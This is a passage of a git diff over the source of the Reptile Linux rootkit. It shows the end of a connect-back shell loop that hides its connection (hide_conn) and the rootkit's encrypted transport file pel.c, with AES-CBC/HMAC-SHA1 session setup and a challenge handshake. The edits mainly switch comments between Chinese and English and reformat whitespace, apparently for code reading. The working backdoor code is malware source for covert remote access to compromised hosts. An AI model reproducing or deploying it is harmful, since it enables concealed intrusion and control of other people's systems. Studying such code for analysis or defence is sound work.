                if (pel_send_msg(client, (unsigned char *)EXIT, EXIT_LEN) != PEL_SUCCESS)
                    goto end;
                goto connect;
            default:
                break;
            }
        }
    end:
        shutdown(client, 2);
 #ifdef _REPTILE_
-        hide_conn(client_addr, UNHIDE);
+		hide_conn(client_addr, UNHIDE);
 #endif
-    } while (delay > 0);
+	} while (delay > 0);
 out:
-    if (connect_back_host) 
+	if (connect_back_host) 
-        free(connect_back_host);
+		free(connect_back_host);
-    if (secret) 
+	if (secret) 
-        free(secret);
+		free(secret);
-    return 0;
+	return 0;
-}
+}
--- a/src/Reptile/userland/transport/pel.c
+++ b/src/Reptile/userland/transport/pel.c
@ -14,42 +14,42 @@
 #include "pel.h"
 #include "sha1.h"
-/* 全局数据 */
+/* global data */
 int pel_errno;
 struct pel_context {
-	/* AES-CBC-128 变量 */
+	/* AES-CBC-128 variables */
-	struct aes_context SK; /* Rijndael 会话密钥 */
+	struct aes_context SK; /* Rijndael session key  */
-	unsigned char LCT[16]; /* 最后一个密文块 */
+	unsigned char LCT[16]; /* last ciphertext block */
-	/* HMAC-SHA1 变量 */
+	/* HMAC-SHA1 variables */
-	unsigned char k_ipad[64]; /* 内部填充 */
+	unsigned char k_ipad[64]; /* inner padding  */
-	unsigned char k_opad[64]; /* 外部填充 */
+	unsigned char k_opad[64]; /* outer padding  */
-	unsigned long int p_cntr; /* 数据包计数器 */
+	unsigned long int p_cntr; /* packet counter */
 };
-struct pel_context send_ctx; /* 用于加密传出数据 */
+struct pel_context send_ctx; /* to encrypt outgoing data */
-struct pel_context recv_ctx; /* 用于解密传入数据 */
+struct pel_context recv_ctx; /* to decrypt incoming data */
-unsigned char challenge[16] = /* 版本特定 */
+unsigned char challenge[16] = /* version-specific */
-	"\x58\x90\xAE\x86\xF1\xB9\x1C\xF6"
+    "\x58\x90\xAE\x86\xF1\xB9\x1C\xF6"
-	"\x29\x83\x95\x71\x1D\xDE\x58\x0D";
+    "\x29\x83\x95\x71\x1D\xDE\x58\x0D";
 unsigned char buffer[BUFSIZE + 16 + 20];
-/* 函数声明 */
+/* function declaration */
 void pel_setup_context(struct pel_context *pel_ctx, char *key,
-			   unsigned char IV[20]);
+		       unsigned char IV[20]);
 int pel_send_all(int s, void *buf, size_t len, int flags);
 int pel_recv_all(int s, void *buf, size_t len, int flags);
-/* 会话初始化 - 客户端 */
+/* session setup - client side */
 int pel_client_init(int server, char *key)
 {
@ -58,7 +58,7 @@ int pel_client_init(int server, char *key)
 	struct sha1_context sha1_ctx;
 	unsigned char IV1[20], IV2[20];
-	/* 生成两个初始化向量 */
+	/* generate both initialization vectors */
 	pid = getpid();
@ -90,26 +90,26 @@ int pel_client_init(int server, char *key)
 	memcpy(IV2, &buffer[20], 20);
-	/* 将它们传递给服务器 */
+	/* and pass them to the server */
 	ret = pel_send_all(server, buffer, 40, 0);
 	if (ret != PEL_SUCCESS)
 		return (PEL_FAILURE);
-	/* 设置会话密钥 */
+	/* setup the session keys */
 	pel_setup_context(&send_ctx, key, IV1);
 	pel_setup_context(&recv_ctx, key, IV2);
-	/* 握手 - 加密并发送客户端的挑战 */
+	/* handshake - encrypt and send the client's challenge */
 	ret = pel_send_msg(server, challenge, 16);
 	if (ret != PEL_SUCCESS)
 		return (PEL_FAILURE);
-	/* 握手 - 解密并验证服务器的挑战 */
+	/* handshake - decrypt and verify the server's challenge */
 	ret = pel_recv_msg(server, buffer, &len);
@ -127,14 +127,14 @@ int pel_client_init(int server, char *key)
 	return (PEL_SUCCESS);
 }
-/* 会话初始化 - 服务器 */
+/* session setup - server side */
 int pel_server_init(int client, char *key)
 {
 	int ret, len;
 	unsigned char IV1[20], IV2[20];
-	/* 从客户端获取 IVs */
+	/* get the IVs from the client */
 	ret = pel_recv_all(client, buffer, 40, 0);
@ -144,12 +144,12 @@ int pel_server_init(int client, char *key)
 	memcpy(IV2, &buffer[0], 20);
 	memcpy(IV1, &buffer[20], 20);
-	/* 设置会话密钥 */
+	/* setup the session keys */
 	pel_setup_context(&send_ctx, key, IV1);
 	pel_setup_context(&recv_ctx, key, IV2);
-	/* 握手 - 解密并验证客户端的挑战 */
+	/* handshake - decrypt and verify the client's challenge */
 	ret = pel_recv_msg(client, buffer, &len);
@ -162,7 +162,7 @@ int pel_server_init(int client, char *key)
 		return (PEL_FAILURE);
 	}
-	/* 握手 - 加密并发送服务器的挑战 */
+	/* handshake - encrypt and send the server's challenge */
 	ret = pel_send_msg(client, challenge, 16);
@ -174,10 +174,10 @@ int pel_server_init(int client, char *key)
 	return (PEL_SUCCESS);
 }
-/* 该例程计算 AES 和 HMAC 会话密钥 */
+/* this routine computes the AES & HMAC session keys */
 void pel_setup_context(struct pel_context *pel_ctx, char *key,
-			   unsigned char IV[20])
+		       unsigned char IV[20])
 {
 	int i;
 	struct sha1_context sha1_ctx;
@ -202,7 +202,7 @@ void pel_setup_context(struct pel_context *pel_ctx, char *key,
 	pel_ctx->p_cntr = 0;
 }
-/* 加密并传输消息 */
+/* encrypt and transmit a message */
 int pel_send_msg(int sockfd, unsigned char *msg, int length)
 {
@ -210,7 +210,7 @@ int pel_send_msg(int sockfd, unsigned char *msg, int length)
 	struct sha1_context sha1_ctx;
 	int i, j, ret, blk_len;
-	/* 验证消息长度 */
+	/* verify the message length */
 	if (length <= 0 || length > BUFSIZE) {
 		pel_errno = PEL_BAD_MSG_LENGTH;
@ -218,16 +218,16 @@ int pel_send_msg(int sockfd, unsigned char *msg, int length)
 		return (PEL_FAILURE);
 	}
-	/* 将消息长度写入缓冲区开始位置 */
+	/* write the message length at start of buffer */
 	buffer[0] = (length >> 8) & 0xFF;
 	buffer[1] = (length)&0xFF;
-	/* 追加消息内容 */
+	/* append the message content */
 	memcpy(buffer + 2, msg, length);
-	/* 向上取整到 AES 块长度 (16 字节) */
+	/* round up to AES block length (16 bytes) */
 	blk_len = 2 + length;
@ -235,7 +235,7 @@ int pel_send_msg(int sockfd, unsigned char *msg, int length)
 		blk_len += 16 - (blk_len & 0x0F);
 	}
-	/* 使用 AES-CBC-128 加密缓冲区 */
+	/* encrypt the buffer with AES-CBC-128 */
 	for (i = 0; i < blk_len; i += 16) {
 		for (j = 0; j < 16; j++) {
@ -247,7 +247,7 @@ int pel_send_msg(int sockfd, unsigned char *msg, int length)
 		memcpy(send_ctx.LCT, &buffer[i], 16);
 	}
-	/* 计算密文的 HMAC-SHA1 */
+	/* compute the HMAC-SHA1 of the ciphertext */
 	buffer[blk_len] = (send_ctx.p_cntr << 24) & 0xFF;
 	buffer[blk_len + 1] = (send_ctx.p_cntr << 16) & 0xFF;
@ -264,11 +264,11 @@ int pel_send_msg(int sockfd, unsigned char *msg, int length)
 	sha1_update(&sha1_ctx, digest, 20);
 	sha1_finish(&sha1_ctx, &buffer[blk_len]);
-	/* 增加数据包计数器 */
+	/* increment the packet counter */
 	send_ctx.p_cntr++;
-	/* 传输密文和消息认证码 */
+	/* transmit ciphertext and message authentication code */
 	ret = pel_send_all(sockfd, buffer, blk_len + 20, 0);
@ -280,7 +280,7 @@ int pel_send_msg(int sockfd, unsigned char *msg, int length)
 	return (PEL_SUCCESS);
 }
-/* 接收并解密消息 */
+/* receive and decrypt a message */
 int pel_recv_msg(int sockfd, unsigned char *msg, int *length)
 {
@ -290,14 +290,14 @@ int pel_recv_msg(int sockfd, unsigned char *msg, int *length)
 	struct sha1_context sha1_ctx;
 	int i, j, ret, blk_len;
-	/* 接收第一个加密块 */
+	/* receive the first encrypted block */
 	ret = pel_recv_all(sockfd, buffer, 16, 0);
 	if (ret != PEL_SUCCESS)
 		return (PEL_FAILURE);
-	/* 解密该块并提取消息长度 */
+	/* decrypt this block and extract the message length */
 	memcpy(temp, buffer, 16);
@ -309,11 +309,11 @@ int pel_recv_msg(int sockfd, unsigned char *msg, int *length)
 	*length = (((int)buffer[0]) << 8) + (int)buffer[1];
-	/* 恢复密文 */
+	/* restore the ciphertext */
 	memcpy(buffer, temp, 16);
-	/* 验证消息长度 */
+	/* verify the message length */
 	if (*length <= 0 || *length > BUFSIZE) {
 		pel_errno = PEL_BAD_MSG_LENGTH;
@ -321,7 +321,7 @@ int pel_recv_msg(int sockfd, unsigned char *msg, int *length)
 		return (PEL_FAILURE);
 	}
-	/* 向上取整到 AES 块长度 (16 字节) */
+	/* round up to AES block length (16 bytes) */
 	blk_len = 2 + *length;
@ -329,7 +329,7 @@ int pel_recv_msg(int sockfd, unsigned char *msg, int *length)
 		blk_len += 16 - (blk_len & 0x0F);
 	}
-	/* 接收剩余的密文和 mac */
+	/* receive the remaining ciphertext and the mac */
 	ret = pel_recv_all(sockfd, &buffer[16], blk_len - 16 + 20, 0);
@ -338,7 +338,7 @@ int pel_recv_msg(int sockfd, unsigned char *msg, int *length)
 	memcpy(hmac, &buffer[blk_len], 20);
-	/* 验证密文完整性 */
+	/* verify the ciphertext integrity */
 	buffer[blk_len] = (recv_ctx.p_cntr << 24) & 0xFF;
 	buffer[blk_len + 1] = (recv_ctx.p_cntr << 16) & 0xFF;
@ -361,11 +361,11 @@ int pel_recv_msg(int sockfd, unsigned char *msg, int *length)
 		return (PEL_FAILURE);
 	}
-	/* 增加数据包计数器 */
+	/* increment the packet counter */
 	recv_ctx.p_cntr++;
-	/* 最后，解密并复制消息 */
+	/* finally, decrypt and copy the message */
 	for (i = 0; i < blk_len; i += 16) {
 		memcpy(temp, &buffer[i], 16);
@ -386,7 +386,7 @@ int pel_recv_msg(int sockfd, unsigned char *msg, int *length)
 	return (PEL_SUCCESS);
 }
-/* 发送/接收包装器以处理分段的 TCP 数据包 */
+/* send/recv wrappers to handle fragmented TCP packets */
 int pel_send_all(int s, void *buf, size_t len, int flags)
 {
Author	SHA1	Message	Date
shenzexi	644304d879	code reading	4 months ago
shenzexi	c1ef6ff634	Code Explanation	4 months ago